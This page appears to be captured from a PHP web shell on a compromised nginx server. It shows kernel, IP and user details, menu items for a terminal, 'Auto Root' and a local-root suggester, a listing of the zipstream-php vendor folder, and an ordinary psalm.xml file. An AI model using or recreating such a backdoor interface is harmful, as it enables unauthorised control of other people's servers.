Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.222.23.166
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
vendor /
maennchen /
zipstream-php /
Delete
Unzip
Name
Size
Permission
Date
Action
.phive
[ DIR ]
drwxrwxr-x
2022-11-25 18:57
.phpdoc
[ DIR ]
drwxrwxr-x
2022-11-25 18:57
guides
[ DIR ]
drwxrwxr-x
2022-11-25 18:57
src
[ DIR ]
drwxrwxr-x
2022-11-25 18:57
test
[ DIR ]
drwxrwxr-x
2022-11-25 18:57
.php-cs-fixer.dist.php
2.18
KB
-rw-rw-r--
2022-11-25 18:57
.tool-versions
11
B
-rw-rw-r--
2022-11-25 18:57
LICENSE
1.24
KB
-rw-rw-r--
2022-11-25 18:57
README.md
5.69
KB
-rw-rw-r--
2022-11-25 18:57
composer.json
2.11
KB
-rw-rw-r--
2022-11-25 18:57
phpdoc.dist.xml
1.25
KB
-rw-rw-r--
2022-11-25 18:57
phpunit.xml.dist
464
B
-rw-rw-r--
2022-11-25 18:57
psalm.xml
1.78
KB
-rw-rw-r--
2022-11-25 18:57
Save
Rename
<?xml version="1.0"?> <psalm resolveFromConfigFile="true" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="https://getpsalm.org/schema/config" xsi:schemaLocation="https://getpsalm.org/schema/config vendor/vimeo/psalm/config.xsd" > <projectFiles> <directory name="src" /> <ignoreFiles> <directory name="vendor" /> </ignoreFiles> </projectFiles> <issueHandlers> <LessSpecificReturnType errorLevel="info" /> <!-- level 3 issues - slightly lazy code writing, but provably low false-negatives --> <DeprecatedMethod errorLevel="info" /> <DeprecatedProperty errorLevel="info" /> <DeprecatedClass errorLevel="info" /> <DeprecatedConstant errorLevel="info" /> <DeprecatedFunction errorLevel="info" /> <DeprecatedInterface errorLevel="info" /> <DeprecatedTrait errorLevel="info" /> <InternalMethod errorLevel="info" /> <InternalProperty errorLevel="info" /> <InternalClass errorLevel="info" /> <MissingClosureReturnType errorLevel="info" /> <MissingReturnType errorLevel="info" /> <MissingPropertyType errorLevel="info" /> <InvalidDocblock errorLevel="info" /> <PropertyNotSetInConstructor errorLevel="info" /> <MissingConstructor errorLevel="info" /> <MissingClosureParamType errorLevel="info" /> <MissingParamType errorLevel="info" /> <RedundantCondition errorLevel="info" /> <DocblockTypeContradiction errorLevel="info" /> <RedundantConditionGivenDocblockType errorLevel="info" /> <UnresolvableInclude errorLevel="info" /> <RawObjectIteration errorLevel="info" /> <InvalidStringClass errorLevel="info" /> </issueHandlers> </psalm>